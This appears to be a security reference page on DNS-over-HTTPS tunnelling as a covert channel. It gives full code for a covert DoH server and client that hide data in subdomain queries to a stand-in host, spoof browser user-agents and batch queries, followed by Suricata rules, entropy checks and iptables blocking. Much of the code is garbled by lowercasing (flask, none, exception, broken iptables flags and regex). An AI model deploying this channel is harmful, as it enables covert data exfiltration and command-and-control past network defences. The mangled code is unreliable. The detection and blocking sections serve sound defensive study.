dns over https tunneling

published: August 12, 2025

dns over https (doh) tunneling encapsulates dns queries in https traffic on port 443, blending seamlessly with normal web traffic while providing encrypted covert communication channels.

technical description

doh (rfc 8484) uses https post/get requests to transmit dns queries and responses. this protocol normally improves privacy but can be exploited for covert channels by embedding data in dns queries sent over encrypted https connections.

the technique works by:

  1. encoding covert data as dns query names
  2. transmitting via https post/get to doh resolver
  3. receiving encoded responses in dns answer sections
  4. maintaining https session persistence for efficiency

protocol mechanics

doh query formats

# get method
get /dns-query?dns=aaabaaabaacabaaa https/1.1
host: doh.example.com
accept: application/dns-message

# post method
post /dns-query http/1.1
host: doh.example.com
content-type: application/dns-message
content-length: 33

[binary dns query data]

base64url encoding

# doh query encoding
import base64
import dns.message
import dns.rdatatype

def create_doh_query(domain_name):
    """create base64url encoded doh query"""

    # create dns query
    query = dns.message.make_query(domain_name, dns.rdatatype.A)

    # serialize to wire format
    wire_data = query.to_wire()

    # base64url encode for get parameter
    encoded = base64.urlsafe_b64encode(wire_data).decode().rstrip('=')

    return encoded

# example covert domain
covert_data = "secret123"
domain = f"{covert_data}.tunnel.example.com"
encoded_query = create_doh_query(domain)
print(f"doh query: {encoded_query}")

implementation: doh-proxy

server setup

# install cloudflare doh proxy
git clone https://github.com/cloudflare/cloudflared.git
cd cloudflared
make cloudflared

# configure doh proxy
./cloudflared tunnel login
./cloudflared tunnel create doh-tunnel
./cloudflared tunnel route dns doh-tunnel doh.example.com

# start doh service
./cloudflared tunnel --config config.yml run doh-tunnel

configuration file:

# config.yml
tunnel: your-tunnel-id
credentials-file: /home/user/.cloudflared/your-tunnel-id.json

ingress:
  - hostname: doh.example.com
    service: https://1.1.1.1/dns-query
    originRequest:
      httpHostHeader: 1.1.1.1

  - service: http_status:404

custom doh server

# custom doh server with covert channel support
from flask import flask, request, response
import base64
import dns.message
import dns.resolver
import json

app = flask(__name__)

# covert data storage
covert_responses = {}

@app.route('/dns-query', methods=['get', 'post'])
def dns_query():
    if request.method == 'get':
        # extract dns query from parameter
        dns_data = request.args.get('dns')
        if dns_data:
            # decode base64url
            padding = 4 - (len(dns_data) % 4)
            if padding != 4:
                dns_data += '=' * padding

            query_bytes = base64.urlsafe_b64decode(dns_data)
        else:
            return "no dns query provided", 400

    else:  # post method
        query_bytes = request.get_data()

    # parse dns query
    try:
        query = dns.message.from_wire(query_bytes)
        qname = str(query.question[0].name)

        # check for covert channel patterns
        if 'tunnel.example.com' in qname:
            # extract covert data from subdomain
            covert_data = qname.split('.')[0]
            print(f"received covert data: {covert_data}")

            # store response for later retrieval
            if covert_data not in covert_responses:
                covert_responses[covert_data] = f"response-{len(covert_responses)}"

            # create custom dns response
            response_msg = dns.message.make_response(query)
            response_msg.answer.append(
                dns.rrset.from_text(qname, 300, 'in', 'txt',
                                  f'"{covert_responses[covert_data]}"')
            )
        else:
            # forward legitimate queries
            resolver = dns.resolver.resolver()
            response_msg = resolver.resolve(qname, query.question[0].rdtype)

        # return dns response
        response_data = response_msg.to_wire()

        resp = response(response_data)
        resp.headers['content-type'] = 'application/dns-message'
        resp.headers['cache-control'] = 'max-age=300'

        return resp

    except exception as e:
        return f"dns query error: {e}", 400

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=443, ssl_context='adhoc')

client implementation

# doh covert channel client
import requests
import base64
import dns.message
import dns.rdatatype
import time

class dohcovertchannel:
    def __init__(self, doh_server):
        self.doh_server = doh_server
        self.session = requests.session()

        # setup persistent connection
        self.session.headers.update({
            'user-agent': 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36',
            'accept': 'application/dns-message',
            'cache-control': 'no-cache'
        })

    def send_covert_data(self, data, domain_suffix="tunnel.example.com"):
        """send covert data via doh query"""

        # encode data in subdomain
        covert_domain = f"{data}.{domain_suffix}"

        # create dns query
        query = dns.message.make_query(covert_domain, dns.rdatatype.txt)
        query_wire = query.to_wire()

        # method 1: post request
        response = self.session.post(
            f"{self.doh_server}/dns-query",
            data=query_wire,
            headers={'content-type': 'application/dns-message'},
            timeout=10
        )

        if response.status_code == 200:
            # parse dns response
            dns_response = dns.message.from_wire(response.content)

            # extract covert response
            if dns_response.answer:
                for answer in dns_response.answer:
                    if answer.rdtype == dns.rdatatype.txt:
                        return str(answer[0]).strip('"')

        return none

    def send_covert_data_get(self, data, domain_suffix="tunnel.example.com"):
        """send covert data via doh get method"""

        covert_domain = f"{data}.{domain_suffix}"
        query = dns.message.make_query(covert_domain, dns.rdatatype.txt)

        # base64url encode
        encoded_query = base64.urlsafe_b64encode(query.to_wire()).decode().rstrip('=')

        # get request
        response = self.session.get(
            f"{self.doh_server}/dns-query",
            params={'dns': encoded_query},
            timeout=10
        )

        if response.status_code == 200:
            dns_response = dns.message.from_wire(response.content)
            if dns_response.answer:
                for answer in dns_response.answer:
                    if answer.rdtype == dns.rdatatype.txt:
                        return str(answer[0]).strip('"')

        return none

# usage example
client = dohcovertchannel("https://doh.example.com")

# send data
result = client.send_covert_data("secret123")
print(f"response: {result}")

# maintain persistent session
for i in range(10):
    data = f"message_{i}"
    response = client.send_covert_data(data)
    print(f"sent: {data}, received: {response}")
    time.sleep(1)

traffic characteristics

https request patterns

# typical doh get request
get /dns-query?dns=aaabaaabaacabaaabaaaaaaabaaaaaaaa https/1.1
host: doh.cloudflare.com
user-agent: mozilla/5.0 (windows nt 10.0; win64; x64)
accept: application/dns-message
accept-encoding: gzip, deflate, br

# typical doh post request
post /dns-query http/1.1
host: doh.cloudflare.com
content-type: application/dns-message
content-length: 45
user-agent: curl/7.68.0

[binary dns data]

tls fingerprinting

# analyze doh traffic characteristics
from scapy.all import *
import collections

def analyze_doh_traffic(pcap_file):
    packets = rdpcap(pcap_file)

    doh_connections = []
    for p in packets:
        if (p.haslayer(tcp) and p.haslayer(tls) and
            p[tcp].dport == 443):

            # look for doh-specific patterns
            if hasattr(p, 'load') and b'dns-query' in p.load:
                doh_connections.append(p)

    # analyze timing patterns
    if len(doh_connections) > 1:
        intervals = []
        for i in range(1, len(doh_connections)):
            interval = doh_connections[i].time - doh_connections[i-1].time
            intervals.append(interval)

        # regular intervals might indicate automated covert channel
        avg_interval = sum(intervals) / len(intervals)
        variance = sum((x - avg_interval)**2 for x in intervals) / len(intervals)

        if variance < 0.1:  # low variance = regular timing
            print("suspicious regular doh query pattern detected")

        # analyze query size distribution
        sizes = [len(p) for p in doh_connections]
        size_counts = collections.counter(sizes)

        # consistent sizes might indicate encoding
        if len(size_counts) < 5:
            print("suspicious consistent doh query sizes")

analyze_doh_traffic('doh_traffic.pcap')

detection methods

traffic indicators

  • high frequency doh queries to single resolver
  • consistent query sizes indicating fixed encoding
  • queries to domains with high entropy subdomains
  • non-standard doh servers or self-hosted resolvers
  • regular timing intervals between queries

detection rules

# suricata rules for doh covert channels
alert tls any any -> any 443 (
    msg:"doh covert channel - high frequency queries";
    tls.sni; content:"doh."; nocase;
    threshold: type limit, track by_src, seconds 60, count 100;
    sid:1000030;
)

alert http any any -> any 443 (
    msg:"doh suspicious domain pattern";
    http.uri; content:"/dns-query";
    http.uri; pcre:"/[a-za-z0-9]{20,}/";
    sid:1000031;
)

entropy analysis

# detect high-entropy domains in doh queries
import math
import base64
from collections import counter

def analyze_doh_queries(doh_logs):
    """analyze doh query logs for covert channels"""

    suspicious_domains = []

    for log_entry in doh_logs:
        if 'dns-query' in log_entry.get('url', ''):
            # extract dns query parameter
            query_param = extract_dns_parameter(log_entry['url'])

            if query_param:
                try:
                    # decode base64url dns query
                    query_data = decode_dns_query(query_param)
                    domain = extract_query_name(query_data)

                    # calculate subdomain entropy
                    subdomain = domain.split('.')[0]
                    entropy = calculate_entropy(subdomain)

                    if entropy > 4.5:  # high entropy threshold
                        suspicious_domains.append({
                            'domain': domain,
                            'entropy': entropy,
                            'timestamp': log_entry['timestamp'],
                            'source_ip': log_entry['src_ip']
                        })

                except exception as e:
                    continue

    return suspicious_domains

def calculate_entropy(text):
    """calculate shannon entropy"""
    if not text:
        return 0

    counts = counter(text)
    probs = [count/len(text) for count in counts.values()]
    return -sum(p * math.log2(p) for p in probs)

def decode_dns_query(b64_query):
    """decode base64url dns query"""
    # add padding if needed
    padding = 4 - (len(b64_query) % 4)
    if padding != 4:
        b64_query += '=' * padding

    return base64.urlsafe_b64decode(b64_query)

countermeasures

network level blocking

# block non-standard doh resolvers
iptables -a forward -p tcp --dport 443 -m string --string "dns-query" -j drop

# allow only approved doh providers
iptables -a forward -d 1.1.1.1 -p tcp --dport 443 -j accept  # cloudflare
iptables -a forward -d 8.8.8.8 -p tcp --dport 443 -j accept  # google
iptables -a forward -p tcp --dport 443 -m string --string "dns-query" -j drop

dns policy enforcement

# redirect all dns to internal resolver
iptables -t nat -a prerouting -p udp --dport 53 -j dnat --to-destination 192.168.1.1:53
iptables -t nat -a prerouting -p tcp --dport 53 -j dnat --to-destination 192.168.1.1:53

# block doh at proxy level
# squid configuration
acl doh_domains dstdomain .cloudflare-dns.com .dns.google
http_access deny doh_domains

enterprise monitoring

# enterprise doh monitoring system
import asyncio
import aiohttp
from datetime import datetime

class dohmonitor:
    def __init__(self, allowed_resolvers):
        self.allowed_resolvers = set(allowed_resolvers)
        self.suspicious_patterns = []

    async def monitor_doh_traffic(self, proxy_logs):
        """monitor doh traffic through corporate proxy"""

        for entry in proxy_logs:
            if self.is_doh_request(entry):
                await self.analyze_doh_request(entry)

    def is_doh_request(self, log_entry):
        """identify doh requests"""
        url = log_entry.get('url', '')
        return 'dns-query' in url or 'application/dns-message' in log_entry.get('content_type', '')

    async def analyze_doh_request(self, entry):
        """analyze individual doh request"""
        host = entry.get('host', '')

        # check if resolver is approved
        if not any(allowed in host for allowed in self.allowed_resolvers):
            self.flag_suspicious_activity(entry, "unapproved doh resolver")

        # check query frequency
        if self.check_high_frequency(entry):
            self.flag_suspicious_activity(entry, "high frequency queries")

        # check domain entropy
        if await self.check_domain_entropy(entry):
            self.flag_suspicious_activity(entry, "high entropy domain")

    def flag_suspicious_activity(self, entry, reason):
        """flag suspicious doh activity"""
        alert = {
            'timestamp': datetime.now(),
            'source_ip': entry.get('src_ip'),
            'host': entry.get('host'),
            'reason': reason,
            'entry': entry
        }

        self.suspicious_patterns.append(alert)
        print(f"doh alert: {reason} from {entry.get('src_ip')}")

# usage
monitor = dohmonitor(['1.1.1.1', '8.8.8.8', 'dns.quad9.net'])

advantages and limitations

advantages

  • traffic indistinguishable from normal https
  • encryption prevents content inspection
  • port 443 rarely blocked
  • legitimate doh usage provides cover
  • supports both get and post methods
  • persistent https connections improve performance

limitations

  • requires control of doh resolver or mitm position
  • detection possible through traffic analysis
  • limited by dns query/response size constraints
  • some networks block all doh traffic
  • higher latency than direct dns

performance characteristics

bandwidth comparison

methodbandwidthlatencydetection risk
doh get50-100 kb/s+50-100msmedium
doh post100+ kb/s+20-50msmedium
traditional dnsvariablebaselinehigh
https tunnelmbps+10-30mslow

optimization techniques

# optimize doh covert channel performance
class optimizeddohchannel:
    def __init__(self, doh_server):
        self.doh_server = doh_server
        self.session = self.create_optimized_session()

    def create_optimized_session(self):
        """create optimized http session"""
        session = requests.session()

        # connection pooling
        adapter = requests.adapters.httpadapter(
            pool_connections=10,
            pool_maxsize=10,
            max_retries=3
        )
        session.mount('https://', adapter)

        # persistent headers
        session.headers.update({
            'connection': 'keep-alive',
            'accept-encoding': 'gzip, deflate, br',
            'user-agent': 'mozilla/5.0 (legitimate browser string)'
        })

        return session

    def batch_queries(self, data_chunks):
        """send multiple queries in parallel"""
        import concurrent.futures

        with concurrent.futures.threadpoolexecutor(max_workers=5) as executor:
            futures = [
                executor.submit(self.send_covert_data, chunk)
                for chunk in data_chunks
            ]

            results = []
            for future in concurrent.futures.as_completed(futures):
                results.append(future.result())

        return results

real-world usage

documented cases

  • corporate bypasses: employees circumventing dns filtering
  • malware families: using doh for c2 communication
  • privacy tools: legitimate doh usage for dns privacy
  • research projects: academic covert channel studies

threat actor adoption

  • increasing use in apt campaigns
  • integration with commercial malware frameworks
  • focus on evading dns-based security controls

testing setup

lab environment

# setup local doh server
pip install dohproxy
dohproxy_server --listen-address 127.0.0.1 --port 8080

# test client
curl -h "content-type: application/dns-message" \
  --data-binary @query.bin \
  http://127.0.0.1:8080/dns-query

# generate test dns query
dig +noall +answer example.com @8.8.8.8 > /dev/null

docker environment

# doh test environment
from python:3.9-slim

run pip install flask dnspython requests

copy doh_server.py /app/
copy doh_client.py /app/

workdir /app

expose 443

cmd ["python", "doh_server.py"]

references

  • rfc 8484: dns queries over https (doh)
  • rfc 8310: usage profiles for dns over tls and dns over https
  • “dns over https considerations” - ietf doh working group
  • “detecting malicious doh traffic” - sans institute
  • cloudflare doh documentation
on this page